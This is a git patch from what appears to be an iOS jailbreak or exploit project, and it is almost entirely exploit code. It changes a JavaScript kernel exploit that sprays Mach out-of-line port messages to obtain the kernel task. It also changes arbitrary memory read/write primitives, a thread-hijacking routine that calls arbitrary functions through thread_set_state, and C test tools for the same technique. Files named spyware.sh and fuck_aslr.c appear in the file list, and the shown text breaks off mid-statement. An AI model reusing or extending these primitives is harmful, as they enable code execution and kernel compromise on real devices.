From 7de438565f03123d37f737d2cd905579e90bc21e Mon Sep 17 00:00:00 2001 From: spv Date: Sun, 24 Apr 2022 21:30:15 -0400 Subject: yeet --- build.sh | 0 build_native.sh | 0 exploit.conf | 0 install.sh | 0 install_native.sh | 0 launch.json | 10 +-- old.js | 138 +++++++++++++++--------------- spyware.sh | 0 src/gen/common.h | 0 src/gen/ip_tools.c | 0 src/gen/ip_tools.h | 0 src/gen/patchfinder.h | 0 src/gen/shit.c | 62 +++++++------- src/gen/shit.h | 10 +-- src/gen/stage0_primitives.c | 0 src/gen/stage0_primitives.h | 0 src/gen/stage1_primitives.c | 0 src/gen/stage1_primitives.h | 0 src/js/kexp/exploit.js | 79 ++++++++++++++---- src/js/lib/myutils.js | 6 +- src/js/main.js | 13 +-- src/js/primitives/call.js | 25 +++--- src/js/primitives/mem.js | 15 ++++ tools/backup.c | 150 ++++++++++++++++----------------- tools/build.sh | 0 tools/build_native.sh | 0 tools/ent.xml | 0 tools/fuck_aslr.c | 0 tools/fuck_ptr.c | 0 tools/jit_all_the_things.c | 0 tools/shit.c | 124 +++++++++++++-------------- tools/test.c | 0 tools/testlol.c | 198 ++++++++++++++++++++++---------------------- tools/thread_shit.c | 0 34 files changed, 454 insertions(+), 376 deletions(-) mode change 100644 => 100755 build.sh mode change 100644 => 100755 build_native.sh mode change 100644 => 100755 exploit.conf mode change 100644 => 100755 install.sh mode change 100644 => 100755 install_native.sh mode change 100644 => 100755 launch.json mode change 100644 => 100755 old.js mode change 100644 => 100755 spyware.sh mode change 100644 => 100755 src/gen/common.h mode change 100644 => 100755 src/gen/ip_tools.c mode change 100644 => 100755 src/gen/ip_tools.h mode change 100644 => 100755 src/gen/patchfinder.h mode change 100644 => 100755 src/gen/stage0_primitives.c mode change 100644 => 100755 src/gen/stage0_primitives.h mode change 100644 => 100755 src/gen/stage1_primitives.c mode change 100644 => 100755 src/gen/stage1_primitives.h mode change 100644 => 100755 src/js/kexp/exploit.js mode change 100644 => 100755 src/js/lib/myutils.js mode change 100644 => 100755 tools/backup.c mode change 100644 => 100755 tools/build.sh mode change 100644 => 100755 tools/build_native.sh mode change 100644 => 100755 tools/ent.xml mode change 100644 => 100755 tools/fuck_aslr.c mode change 100644 => 100755 tools/fuck_ptr.c mode change 100644 => 100755 tools/jit_all_the_things.c mode change 100644 => 100755 tools/shit.c mode change 100644 => 100755 tools/test.c mode change 100644 => 100755 tools/testlol.c mode change 100644 => 100755 tools/thread_shit.c diff --git a/build.sh b/build.sh old mode 100644 new mode 100755 diff --git a/build_native.sh b/build_native.sh old mode 100644 new mode 100755 diff --git a/exploit.conf b/exploit.conf old mode 100644 new mode 100755 diff --git a/install.sh b/install.sh old mode 100644 new mode 100755 diff --git a/install_native.sh b/install_native.sh old mode 100644 new mode 100755 diff --git a/launch.json b/launch.json old mode 100644 new mode 100755 index c2fecf3..1a7df09 --- a/launch.json +++ b/launch.json @@ -1,6 +1,6 @@ -{ - "name": "Launch", - "type": "lldb", - "request": "launch", - "program": "${workspaceFolder}/tools/bin/thread_shit" +{ + "name": "Launch", + "type": "lldb", + "request": "launch", + "program": "${workspaceFolder}/tools/bin/thread_shit" } \ No newline at end of file diff --git a/old.js b/old.js old mode 100644 new mode 100755 index 2dd0509..ce19c94 --- a/old.js +++ b/old.js @@ -1,70 +1,70 @@ -var dyld_shc_slide = get_dyld_shc_slide(); - - printf("still alive0\n"); - write_u32(0x346afc48 + dyld_shc_slide, 0x23d751fc + dyld_shc_slide); - printf("still alive1\n"); - write_u32(stack_shit + 0x0, 0x42069); - printf("still alive2\n"); - write_u32(stack_shit + 0x1, 0x69420); - printf("still alive3\n"); - write_u32(stack_shit + 0x2, 0x13371337); - printf("still alive4\n"); - write_u32(stack_shit + 0x3, 0x6969); - printf("still alive5\n"); - - printf("%s\n", prim_hexdump(read_buf(thread, 0x100))); - calls4arg("pthread_create", threadptr, 0, 0x23d751fc + dyld_shc_slide, 0); - printf("%x\n", read_u32(threadptr)); - thread = read_u32(threadptr); - calls4arg("usleep", 100000, 0, 0, 0); - printf("%s\n", prim_hexdump(read_buf(thread, 0x100))); -// call4arg(0x41414141, 0, 0, 0, 0); - printf("still alive6\n"); - write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0)); -// write_u32(th, 0xa03); - printf("thread=%x th=%x sym=%x\n", read_u32(thread), read_u32(th), sym_cache["pthread_mach_thread_np"]); - - var info = 0x134004; - var whatever = 0x134000; - - /* - var lol = new Uint8Array(0x100); - - for (i = 0; i < 0x10000; i++) { - write_buf(info, lol, 0x100); - write_u32(whatever, 0x100) -// printf("%x\n", calls4arg("mach_thread_self", 0, 0, 0, 0)); - calls4arg("thread_info", i, 3, info, whatever); -// printf("%s\n", prim_hexdump(read_buf(info, 0x100))); - if (read_u32(info) != 0) { -// printf("%s\n", prim_hexdump(read_buf(info, 0x100))); - printf("hit: %x\n", i); - } else if (i % 0x10 == 0) { - printf("%x\n", i); - } - }*/ - - printf("still alive7\n"); - write_u32(thread_state + (0 << 2), sptr("Hello, world! %x %x %x %x %x %x %x\n")); - printf("still alive8\n"); - write_u32(thread_state + (1 << 2), 0x1337); - printf("still alive9\n"); - write_u32(thread_state + (2 << 2), 0x420); - printf("still alive10\n"); - write_u32(thread_state + (3 << 2), 0x69); - printf("still alive11\n"); - write_u32(thread_state + (13 << 2), stack_shit); - printf("still alive12\n"); - write_u32(thread_state + (14 << 2), 0x23d751fc + dyld_shc_slide); - printf("still alive13\n"); - write_u32(thread_state + (15 << 2), sym_cache["printf"]); - printf("still alive14\n"); - write_u32(thread_state + (16 << 2), 0x40000020); - - printf("still alive15\n"); - printf("%d\n", calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT)); - printf("still alive16\n"); - printf("%d\n", calls4arg("thread_resume", read_u32(th), 0, 0, 0)); - printf("still alive17\n"); - +var dyld_shc_slide = get_dyld_shc_slide(); + + printf("still alive0\n"); + write_u32(0x346afc48 + dyld_shc_slide, 0x23d751fc + dyld_shc_slide); + printf("still alive1\n"); + write_u32(stack_shit + 0x0, 0x42069); + printf("still alive2\n"); + write_u32(stack_shit + 0x1, 0x69420); + printf("still alive3\n"); + write_u32(stack_shit + 0x2, 0x13371337); + printf("still alive4\n"); + write_u32(stack_shit + 0x3, 0x6969); + printf("still alive5\n"); + + printf("%s\n", prim_hexdump(read_buf(thread, 0x100))); + calls4arg("pthread_create", threadptr, 0, 0x23d751fc + dyld_shc_slide, 0); + printf("%x\n", read_u32(threadptr)); + thread = read_u32(threadptr); + calls4arg("usleep", 100000, 0, 0, 0); + printf("%s\n", prim_hexdump(read_buf(thread, 0x100))); +// call4arg(0x41414141, 0, 0, 0, 0); + printf("still alive6\n"); + write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0)); +// write_u32(th, 0xa03); + printf("thread=%x th=%x sym=%x\n", read_u32(thread), read_u32(th), sym_cache["pthread_mach_thread_np"]); + + var info = 0x134004; + var whatever = 0x134000; + + /* + var lol = new Uint8Array(0x100); + + for (i = 0; i < 0x10000; i++) { + write_buf(info, lol, 0x100); + write_u32(whatever, 0x100) +// printf("%x\n", calls4arg("mach_thread_self", 0, 0, 0, 0)); + calls4arg("thread_info", i, 3, info, whatever); +// printf("%s\n", prim_hexdump(read_buf(info, 0x100))); + if (read_u32(info) != 0) { +// printf("%s\n", prim_hexdump(read_buf(info, 0x100))); + printf("hit: %x\n", i); + } else if (i % 0x10 == 0) { + printf("%x\n", i); + } + }*/ + + printf("still alive7\n"); + write_u32(thread_state + (0 << 2), sptr("Hello, world! %x %x %x %x %x %x %x\n")); + printf("still alive8\n"); + write_u32(thread_state + (1 << 2), 0x1337); + printf("still alive9\n"); + write_u32(thread_state + (2 << 2), 0x420); + printf("still alive10\n"); + write_u32(thread_state + (3 << 2), 0x69); + printf("still alive11\n"); + write_u32(thread_state + (13 << 2), stack_shit); + printf("still alive12\n"); + write_u32(thread_state + (14 << 2), 0x23d751fc + dyld_shc_slide); + printf("still alive13\n"); + write_u32(thread_state + (15 << 2), sym_cache["printf"]); + printf("still alive14\n"); + write_u32(thread_state + (16 << 2), 0x40000020); + + printf("still alive15\n"); + printf("%d\n", calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT)); + printf("still alive16\n"); + printf("%d\n", calls4arg("thread_resume", read_u32(th), 0, 0, 0)); + printf("still alive17\n"); + calls4arg("sleep", 10, 0, 0, 0); \ No newline at end of file diff --git a/spyware.sh b/spyware.sh old mode 100644 new mode 100755 diff --git a/src/gen/common.h b/src/gen/common.h old mode 100644 new mode 100755 diff --git a/src/gen/ip_tools.c b/src/gen/ip_tools.c old mode 100644 new mode 100755 diff --git a/src/gen/ip_tools.h b/src/gen/ip_tools.h old mode 100644 new mode 100755 diff --git a/src/gen/patchfinder.h b/src/gen/patchfinder.h old mode 100644 new mode 100755 diff --git a/src/gen/shit.c b/src/gen/shit.c index 6e6c5c5..ef354d4 100644 --- a/src/gen/shit.c +++ b/src/gen/shit.c @@ -1,32 +1,32 @@ -#include -#include "common.h" -#include -#include "shit.h" - -extern FILE* fp; - -int _asprintf(char **strp, const char *fmt, ...) { - va_list ap; - char* tmp = NULL; - - *strp = ""; - - /* - * shit - */ - - va_start(ap, fmt); - vfprintf(fp, fmt, ap); - va_end(ap); - -#if 0 - strcpy(fuck_memory_leaks, tmp); - - if (strp) - *strp = fuck_memory_leaks; - - free(tmp); -#endif - - return 0; +#include +#include "common.h" +#include +#include "shit.h" + +extern FILE* fp; + +int _asprintf(char **strp, const char *fmt, ...) { + va_list ap; + char* tmp = NULL; + + *strp = ""; + + /* + * shit + */ + + va_start(ap, fmt); + vfprintf(fp, fmt, ap); + va_end(ap); + +#if 0 + strcpy(fuck_memory_leaks, tmp); + + if (strp) + *strp = fuck_memory_leaks; + + free(tmp); +#endif + + return 0; } \ No newline at end of file diff --git a/src/gen/shit.h b/src/gen/shit.h index aaa4b7f..d97a995 100644 --- a/src/gen/shit.h +++ b/src/gen/shit.h @@ -1,6 +1,6 @@ -#ifndef SHIT_H -#define SHIT_H - -int _asprintf(char **strp, const char *fmt, ...); - +#ifndef SHIT_H +#define SHIT_H + +int _asprintf(char **strp, const char *fmt, ...); + #endif \ No newline at end of file diff --git a/src/gen/stage0_primitives.c b/src/gen/stage0_primitives.c old mode 100644 new mode 100755 diff --git a/src/gen/stage0_primitives.h b/src/gen/stage0_primitives.h old mode 100644 new mode 100755 diff --git a/src/gen/stage1_primitives.c b/src/gen/stage1_primitives.c old mode 100644 new mode 100755 diff --git a/src/gen/stage1_primitives.h b/src/gen/stage1_primitives.h old mode 100644 new mode 100755 diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js old mode 100644 new mode 100755 index c28e59c..e0ef574 --- a/src/js/kexp/exploit.js +++ b/src/js/kexp/exploit.js @@ -29,6 +29,7 @@ var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2; var req_init_port_set_address = 0x0 var req_init_port_set_count = 0x4 +var task_self = 0; var kslide = 0; var fakeportData = 0; @@ -93,7 +94,7 @@ function spray_data(mem, size, num, portptr) { function copyinPort(kport, cnt) { var err = malloc(4); var ret = 0; - var self = mach_task_self(); + var self = task_self; var service = MACH_PORT_NULL; var client = malloc(4); var it = malloc(4); @@ -180,23 +181,43 @@ function spray(dict, size, port) { var kp = 0; function spray_ports(number_port_descs) { - printf("spray_ports\n"); + printf("spray_ports %d\n", number_port_descs); if (kp == 0) { kp = malloc(4); - mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, kp); - mach_port_insert_right(mach_task_self(), read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND); + mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp); + mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND); } var mp = malloc(4); - mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, mp); - printf("%x\n", read_u32(mp)); - mach_port_insert_right(mach_task_self(), read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND); + mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp); + var rmp = read_u32(mp); + mach_port_insert_right(task_self, rmp, rmp, MACH_MSG_TYPE_MAKE_SEND); - send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs); + send_ports(rmp, read_u32(kp), 2, number_port_descs); return mp; } +function fast_log2(n) { + var i = 0; + while (n >>= 1) { + i++; + } + + return i; +} + +function fast_array_mul(arr, n) { + var tmp_arr = arr; + var done = 0; + for (var i = 0; i < fast_log2(n) + 2; i++) { + tmp_arr = tmp_arr.concat(tmp_arr); + done = (1 << i); + } + + return tmp_arr; +} + function send_ports(target, payload, num, number_port_descs) { var init_port_set = malloc(num * 4); @@ -204,23 +225,51 @@ function send_ports(target, payload, num, number_port_descs) { write_u32(init_port_set + (i << 2), payload); } - var buf = malloc(0x1c + (number_port_descs * 0xc)); + var buf = malloc(0x1c + (number_port_descs * 0xc * 8)); + write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs); + var new_buf_ = new Array(); + var tmp = u32_to_u8x4(init_port_set); + new_buf_.push(tmp[0]); + new_buf_.push(tmp[1]); + new_buf_.push(tmp[2]); + new_buf_.push(tmp[3]); + tmp = u32_to_u8x4(num); + new_buf_.push(tmp[0]); + new_buf_.push(tmp[1]); + new_buf_.push(tmp[2]); + new_buf_.push(tmp[3]); + new_buf_.push(0); + new_buf_.push(0); + new_buf_.push(19); + new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR); + + var new_buf = fast_array_mul(new_buf_, number_port_descs); + + fast_write_buf(buf + req_init_port_set, new_buf); + + /* for (var i = 0; i < number_port_descs; i++) { write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_address, init_port_set); write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_count, num); write_u8(buf + (req_init_port_set * (i + 1)) + 0x8, 0); write_u8(buf + (req_init_port_set * (i + 1)) + 0xa, 19); write_u8(buf + (req_init_port_set * (i + 1)) + 0xb, MACH_MSG_OOL_PORTS_DESCRIPTOR); - } + }*/ write_u32(buf + req_head_msgh_bits, 0x80001513); // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE) write_u32(buf + req_head_msgh_request_port, target); write_u32(buf + req_head_msgh_reply_port, 0); write_u32(buf + req_head_msgh_id, 1337); - return mach_msg(read_u32(buf + 0x0), read_u32(buf + 0x4), read_u32(buf + 0x8), read_u32(buf + 0xc), read_u32(buf + 0x10), read_u32(buf + 0x14), 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL); + var ret = mach_msg(buf, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL); + + free(buf); + + printf("%d %s\n", ret, mach_error_string(ret)); + + return ret; } function get_kernel_task() { @@ -229,11 +278,13 @@ function get_kernel_task() { sanity_port = malloc(4); - mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, sanity_port); - mach_port_insert_right(mach_task_self(), read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND); + task_self = mach_task_self(); + + mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, sanity_port); + mach_port_insert_right(task_self, read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND); limits = malloc(4); write_u32(limits, 1000); - mach_port_set_attributes(mach_task_self(), read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT); + mach_port_set_attributes(task_self, read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT); printf("starting exploit\n"); diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js old mode 100644 new mode 100755 index 51fc055..325c490 --- a/src/js/lib/myutils.js +++ b/src/js/lib/myutils.js @@ -112,4 +112,8 @@ var io_service_open_extended = scall_wrapper("io_service_open_extended"); var IORegistryEntryGetChildIterator = scall_wrapper("IORegistryEntryGetChildIterator"); var IOIteratorNext = scall_wrapper("IOIteratorNext"); var IORegistryEntryGetProperty = scall_wrapper("IORegistryEntryGetProperty"); -var mach_msg = scall_wrapper("mach_msg"); \ No newline at end of file +var mach_msg = scall_wrapper("mach_msg"); +var mmap = scall_wrapper("mmap"); +var free = scall_wrapper("free"); +var mlock = scall_wrapper("mlock"); +var mprotect = scall_wrapper("mprotect"); \ No newline at end of file diff --git a/src/js/main.js b/src/js/main.js index 4d978ef..ee0a627 100644 --- a/src/js/main.js +++ b/src/js/main.js @@ -12,6 +12,13 @@ var ARM_THREAD_STATE_COUNT = 0x11; var ARM_THREAD_STATE = 0x1; var LOG_SYSLOG = 0x28; +var PROT_READ = 0x1; +var PROT_WRITE = 0x2; +var PROT_EXEC = 0x4; + +var MAP_PRIVATE = 0x2; +var MAP_ANON = 0x1000; + try { puts("we out here in jsc"); } catch (e) { @@ -22,10 +29,6 @@ try { puts = function (){}; } -function csbypass() { - -} - function main() { /* * get slide and calculate slid base @@ -45,8 +48,6 @@ function main() { puts("we out here"); puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?"); -// csbypass(); - printf("slide=0x%x\n", slide); printf("*(uint8_t*)base = 0x%x\n", read_u8(base)); printf("*(uint16_t*)base = 0x%x\n", read_u16(base)); diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js index 97a47b6..e382470 100644 --- a/src/js/primitives/call.js +++ b/src/js/primitives/call.js @@ -118,6 +118,8 @@ function calls4arg(sym, r0, r1, r2, r3) { return call4arg(addy, r0, r1, r2, r3); } +var rth = 0; + function callnarg() { if (arguments.length < 1) { return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length); @@ -153,8 +155,15 @@ function callnarg() { calls4arg("pthread_create", threadptr, 0, __stack_chk_fail_resolver + dyld_shc_slide, 0); thread = read_u32(threadptr); write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0)); + rth = read_u32(th); + } + + if (rth === 0) { + rth = read_u32(th); } +// calls4arg("thread_suspend", rth, 0, 0, 0); + /* * write first 4 to r0-r3, rest to stack */ @@ -198,12 +207,8 @@ function callnarg() { /* * set the state */ - calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT); - - /* - * probably un-necessary now, keeping in just in case for now - */ - calls4arg("thread_resume", read_u32(th), 0, 0, 0); + calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT); + calls4arg("thread_resume", rth, 0, 0, 0); /* * spin wait for return @@ -212,15 +217,15 @@ function callnarg() { /* * reset, it's used as input for thread_state size */ - write_u32(count, 0x100); - calls4arg("thread_get_state", read_u32(th), ARM_THREAD_STATE, thread_state, count); + write_u32(count, 17); + calls4arg("thread_get_state", rth, ARM_THREAD_STATE, thread_state, count); /* * if the pc is in (resolver, resolver + 8), suspend the thread * (to not spin endlessly), read r0 and return */ if (((read_u32(thread_state + (15 << 2)) - (__stack_chk_fail_resolver + dyld_shc_slide)) <= 8) && (read_u32(thread_state + (11 << 2)) == 0x1337)) { - calls4arg("thread_suspend", read_u32(th), 0, 0, 0); + calls4arg("thread_suspend", rth, 0, 0, 0); return read_u32(thread_state); } @@ -262,7 +267,7 @@ function scall() { args_to_pass.push(sptr(arguments[i])); } else { args_to_pass.push(arguments[i]); - if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000)) { + if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000) && (i == 1 || i == 3)) { force_callnarg = true; } } diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js index 85cd132..ff12fdd 100644 --- a/src/js/primitives/mem.js +++ b/src/js/primitives/mem.js @@ -91,6 +91,21 @@ function write_u32_buf(addy, buf, len) { return buf; } +function fast_write_buf(addy, buf) { + var upper_i = Math.floor(buf.length / 0x100); + + for (var i = 0; i < upper_i; i++) { + u8x4 = u32_to_u8x4(addy + (i * 0x100)); + parent[VECTOR_OFFSET + 0x0] = u8x4[0]; + parent[VECTOR_OFFSET + 0x1] = u8x4[1]; + parent[VECTOR_OFFSET + 0x2] = u8x4[2]; + parent[VECTOR_OFFSET + 0x3] = u8x4[3]; + for (var j = (i * 0x100); (j < (i * 0x100) + 0x100) && (j < buf.length); j++) { + child[j % 0x100] = buf[j]; + } + } +} + /* * write uint8_t */ diff --git a/tools/backup.c b/tools/backup.c old mode 100644 new mode 100755 index 1ed9921..c1472a3 --- a/tools/backup.c +++ b/tools/backup.c @@ -1,76 +1,76 @@ -#include -#include -#include -#include -#include - -void lol(void) { - puts("hello?"); -// *(uint32_t*)0x41424344 = 0; -} - -void* lol2(void* arg) { - while (1) ;; -} - -int main(int argc, char* argv[]) { - kern_return_t kr; - thread_t th; - mach_port_name_t mytask, mythread; - printf("Hello, world!\n"); - mytask = mach_task_self(); - mythread = mach_thread_self(); - - mmap(0x2000000, 0x100000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, 0, 0); - - char* test = malloc(0x100); - strcpy(test, "Hello, world! %x %x %x %x %x %x %x\n"); - - pthread_t thread; - pthread_create(&thread, NULL, lol2, NULL); - - puts("test"); - -// thread_create(mytask, &th); - th = pthread_mach_thread_np(thread); - printf("%x\n", mytask); - arm_thread_state_t state; - mach_msg_type_number_t count; - kr = thread_get_state(mythread, ARM_THREAD_STATE, (thread_state_t)&state, &count); - - uint32_t* stack_above = 0x2001000; - stack_above[0] = 0x42069; - stack_above[1] = 0x69420; - stack_above[3] = 0x13371337; - stack_above[4] = 0x6969; - -// fprintf(stderr, "%p %p\n", test, dlsym(RTLD_DEFAULT, "puts")); - -// exit(42); - -// *(uint32_t*)0x41414141 = 0; - -// memset(&state, 0, ARM_THREAD_STATE_COUNT * sizeof(uint32_t)); - - for (int i = 0; i < 13; i++) { - fprintf(stderr, "r%d=%x\n", i, state.__r[i]); - } - - *(uint32_t*)(0x346afc48 + 0x1b4c000) = 0x23d751fc + 0x1b4c000; - - state.__r[0] = test; - state.__r[1] = 0x1337; - state.__r[2] = 0x420; - state.__r[3] = 0x69; - state.__sp = (uint32_t)stack_above; - state.__lr = 0x23d751fc + 0x1b4c000; - state.__pc = ((uint32_t)dlsym(RTLD_DEFAULT, "printf")) | 1; - state.__cpsr = 0x40000020; - kr = thread_set_state(th, ARM_THREAD_STATE, (thread_state_t)&state, ARM_THREAD_STATE_COUNT); - kr = thread_resume(th); -// thread_call_enter((thread_call_func_t)&lol); - - sleep(1); - - return 0; +#include +#include +#include +#include +#include + +void lol(void) { + puts("hello?"); +// *(uint32_t*)0x41424344 = 0; +} + +void* lol2(void* arg) { + while (1) ;; +} + +int main(int argc, char* argv[]) { + kern_return_t kr; + thread_t th; + mach_port_name_t mytask, mythread; + printf("Hello, world!\n"); + mytask = mach_task_self(); + mythread = mach_thread_self(); + + mmap(0x2000000, 0x100000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, 0, 0); + + char* test = malloc(0x100); + strcpy(test, "Hello, world! %x %x %x %x %x %x %x\n"); + + pthread_t thread; + pthread_create(&thread, NULL, lol2, NULL); + + puts("test"); + +// thread_create(mytask, &th); + th = pthread_mach_thread_np(thread); + printf("%x\n", mytask); + arm_thread_state_t state; + mach_msg_type_number_t count; + kr = thread_get_state(mythread, ARM_THREAD_STATE, (thread_state_t)&state, &count); + + uint32_t* stack_above = 0x2001000; + stack_above[0] = 0x42069; + stack_above[1] = 0x69420; + stack_above[3] = 0x13371337; + stack_above[4] = 0x6969; + +// fprintf(stderr, "%p %p\n", test, dlsym(RTLD_DEFAULT, "puts")); + +// exit(42); + +// *(uint32_t*)0x41414141 = 0; + +// memset(&state, 0, ARM_THREAD_STATE_COUNT * sizeof(uint32_t)); + + for (int i = 0; i < 13; i++) { + fprintf(stderr, "r%d=%x\n", i, state.__r[i]); + } + + *(uint32_t*)(0x346afc48 + 0x1b4c000) = 0x23d751fc + 0x1b4c000; + + state.__r[0] = test; + state.__r[1] = 0x1337; + state.__r[2] = 0x420; + state.__r[3] = 0x69; + state.__sp = (uint32_t)stack_above; + state.__lr = 0x23d751fc + 0x1b4c000; + state.__pc = ((uint32_t)dlsym(RTLD_DEFAULT, "printf")) | 1; + state.__cpsr = 0x40000020; + kr = thread_set_state(th, ARM_THREAD_STATE, (thread_state_t)&state, ARM_THREAD_STATE_COUNT); + kr = thread_resume(th); +// thread_call_enter((thread_call_func_t)&lol); + + sleep(1); + + return 0; } \ No newline at end of file diff --git a/tools/build.sh b/tools/build.sh old mode 100644 new mode 100755 diff --git a/tools/build_native.sh b/tools/build_native.sh old mode 100644 new mode 100755 diff --git a/tools/ent.xml b/tools/ent.xml old mode 100644 new mode 100755 diff --git a/tools/fuck_aslr.c b/tools/fuck_aslr.c old mode 100644 new mode 100755 diff --git a/tools/fuck_ptr.c b/tools/fuck_ptr.c old mode 100644 new mode 100755 diff --git a/tools/jit_all_the_things.c b/tools/jit_all_the_things.c old mode 100644 new mode 100755 diff --git a/tools/shit.c b/tools/shit.c old mode 100644 new mode 100755 index 6fa80d4..1fe00cd --- a/tools/shit.c +++ b/tools/shit.c @@ -1,63 +1,63 @@ -#include -#include -#include - -int main(int argc, char* argv[]) { - kern_return_t kr; - thread_t th; - mach_port_name_t mytask, mythread; - arm_thread_state_t state; - mach_msg_type_number_t count; - printf("Hello, world!\n"); - mytask = mach_task_self(); - mythread = mach_thread_self(); - - printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141); - mmap(0x1300000, 0x100000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, 0, 0); - printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141); - - *(uint32_t*)0x1301004 = 0x1300100; - *(uint32_t*)0x1301008 = 0x1300200; - *(uint32_t*)0x1301000 = 0x1300000; - - *(uint32_t*)0x1302000 = 0x1301000; - *(uint32_t*)0x1302004 = 0x1301004; - *(uint32_t*)0x1302008 = 0x1301008; - - *(uint32_t*)0x1304008 = 0x1303008; - *(uint32_t*)0x1305008 = 0x1304008; - - printf("%d(%x) %d(%x)\n", ARM_THREAD_STATE, ARM_THREAD_STATE, ARM_THREAD_STATE_COUNT, ARM_THREAD_STATE_COUNT); - - // 707 10580c 105848 1057c8 1057c4 41414141 105850 1 0 0 0 0 - printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141); - - printf("still alive?\n"); - printf("%x\n", *(uint32_t*)0x1300000); - kr = thread_create(mytask, 0x1300000); - printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); - - printf("%x\n", *(uint32_t*)0x1300000); - printf("still alive?\n"); - kr = thread_get_state(0x1300000, ARM_THREAD_STATE, 0x1301008, 0x1301000); - - printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); - printf("still alive?\n"); - *(uint32_t*)0x1302008 = 0x41414141; - kr = thread_set_state(0x1300000, ARM_THREAD_STATE, 0x1305008, ARM_THREAD_STATE_COUNT); - - printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); - kr = thread_get_state(0x1300000, ARM_THREAD_STATE, 0x1304008, 0x1301000); - - printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); - printf("%x\n", *(uint32_t*)0x1302008); - printf("still alive?\n"); - kr = thread_resume(0x1300000); - - printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); - printf("still alive?\n"); - - printf("still alive?\n"); - - return 0; +#include +#include +#include + +int main(int argc, char* argv[]) { + kern_return_t kr; + thread_t th; + mach_port_name_t mytask, mythread; + arm_thread_state_t state; + mach_msg_type_number_t count; + printf("Hello, world!\n"); + mytask = mach_task_self(); + mythread = mach_thread_self(); + + printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141); + mmap(0x1300000, 0x100000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, 0, 0); + printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141); + + *(uint32_t*)0x1301004 = 0x1300100; + *(uint32_t*)0x1301008 = 0x1300200; + *(uint32_t*)0x1301000 = 0x1300000; + + *(uint32_t*)0x1302000 = 0x1301000; + *(uint32_t*)0x1302004 = 0x1301004; + *(uint32_t*)0x1302008 = 0x1301008; + + *(uint32_t*)0x1304008 = 0x1303008; + *(uint32_t*)0x1305008 = 0x1304008; + + printf("%d(%x) %d(%x)\n", ARM_THREAD_STATE, ARM_THREAD_STATE, ARM_THREAD_STATE_COUNT, ARM_THREAD_STATE_COUNT); + + // 707 10580c 105848 1057c8 1057c4 41414141 105850 1 0 0 0 0 + printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141); + + printf("still alive?\n"); + printf("%x\n", *(uint32_t*)0x1300000); + kr = thread_create(mytask, 0x1300000); + printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); + + printf("%x\n", *(uint32_t*)0x1300000); + printf("still alive?\n"); + kr = thread_get_state(0x1300000, ARM_THREAD_STATE, 0x1301008, 0x1301000); + + printf("%d %d %s\n", kr, KERN_SUCCESS, mach_error_string(kr)); + printf("still alive?\n"); + *(uint32_t*)0x1302008 = 0x41414141; + kr = 